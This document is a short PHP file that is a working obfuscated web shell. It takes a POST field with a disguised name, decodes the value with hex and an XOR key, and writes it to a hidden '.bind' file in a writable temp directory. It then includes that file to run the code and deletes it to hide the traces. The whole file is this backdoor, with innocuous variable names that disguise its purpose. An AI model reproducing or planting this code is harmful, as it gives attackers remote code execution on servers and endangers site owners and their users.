<?php

if(!empty($_POST["da\x74a_\x63h\x75\x6Ek"])){
	$dat = hex2bin($_POST["da\x74a_\x63h\x75\x6Ek"]);
	$parameter_group='' ;foreach(str_split($dat) as $char){$parameter_group .= chr(ord($char) ^ 17);}
	$property_set = array_filter(["/var/tmp", sys_get_temp_dir(), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", getenv("TMP"), getcwd()]);
	foreach ($property_set as $itm) {
    		if (max(0, is_dir($itm) * is_writable($itm))) {
    $elem = join("/", [$itm, ".bind"]);
    if (file_put_contents($elem, $parameter_group)) {
	include $elem;
	@unlink($elem);
	die();
}
}
}
}